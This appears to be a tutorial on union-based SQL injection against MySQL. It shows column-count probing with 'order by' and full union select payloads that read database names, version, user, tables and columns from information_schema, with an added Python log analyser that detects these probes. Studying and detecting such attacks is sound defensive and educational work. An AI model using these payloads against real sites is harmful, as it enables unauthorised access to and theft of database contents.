Union query

Default interface

The default statement queries the user column of the user table in the mysql database for the value root.
Default page

From here we can go on to determine how many columns the query returns:
order by 100
Query

Then order by 80, lowering the number step by step.
At order by 40 the queried data was displayed again,
so we keep narrowing the range.
At 49 a value is returned, while 50 returns nothing,
so we conclude the query has 49 columns.

Querying the database names

union select (select group_concat(schema_name) from information_schema.schemata),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1;

All database names

Recommended approach

and 1=2 union select (select group_concat(schema_name) from information_schema.schemata),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19;
(Alternatively "and 0": the condition evaluates to false, so the original row is empty and only the union row is shown.)

All database names
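From the defender's side, the two steps above leave a recognisable trace in web access logs: a client walking "order by N" downward until the query stops failing, followed by a "union select" that reads information_schema. The following Python is an added example, not part of the original post; the log format, client addresses, the id parameter and the use of the HTTP status code as the success/failure signal are all constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (not from the original post): 10.0.0.5 walks ORDER BY
# downward to find the column count, then reads information_schema; 10.0.0.9 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /q.php?id=1%20order%20by%20100 HTTP/1.1" 500 0
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /q.php?id=1%20order%20by%2050 HTTP/1.1" 500 0
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /q.php?id=1%20order%20by%2049 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /q.php?id=1%20and%201=2%20union%20select%20(select%20group_concat(schema_name)%20from%20information_schema.schemata),2,3 HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /q.php?id=2 HTTP/1.1" 200 512
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<uri>\S+)[^"]*" (?P<status>\d{3})')
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)\b", re.I)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
SCHEMA_RE = re.compile(r"\binformation_schema\.(?:schemata|tables|columns)\b", re.I)

def analyze(log_text):
    """Decode each request URI and tally the enumeration signals per client IP."""
    per_ip = defaultdict(lambda: {"order_by": [], "union_select": 0, "info_schema": 0})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        uri, status = unquote_plus(m.group("uri")), int(m.group("status"))  # decode %20 etc. first
        rec = per_ip[m.group("ip")]
        rec["order_by"] += [(int(n), status) for n in ORDER_BY_RE.findall(uri)]
        rec["union_select"] += bool(UNION_RE.search(uri))
        rec["info_schema"] += bool(SCHEMA_RE.search(uri))
    return per_ip

def alerts(per_ip, probe_threshold=3):
    """One alert per client matching the pattern. Treating 2xx as 'query ran' and 4xx/5xx
    as 'too many columns' is an assumption; apps that answer 200 with an empty body need the size."""
    out = []
    for ip, rec in sorted(per_ip.items()):
        reasons, probes = [], rec["order_by"]
        if len(probes) >= probe_threshold:
            ok, bad = [n for n, s in probes if s < 400], [n for n, s in probes if s >= 400]
            guess = max(ok) if ok and bad and min(bad) > max(ok) else None  # 49 works, 50 fails -> 49
            reasons.append(f"{len(probes)} ORDER BY probes, column count likely {guess}")
        if rec["union_select"]:
            reasons.append(f"{rec['union_select']} UNION SELECT request(s)")
        if rec["info_schema"]:
            reasons.append(f"{rec['info_schema']} information_schema read(s)")
        if reasons:
            out.append((ip, reasons))
    return out
```

Feed alerts(analyze(open(path).read())) a real log with the same format to get one (ip, reasons) tuple per suspicious client; decoding the URI before matching matters, since the probes arrive percent-encoded.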

Querying the version, the current database and the user

union select version(),database(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1;

Information

Querying the table names

union select (select group_concat(table_name) from information_schema.tables),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1;

All table names

Querying the column names

union select (select group_concat(column_name) from information_schema.columns),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 LIMIT 1,1;

All column names

Querying the column contents

Column contents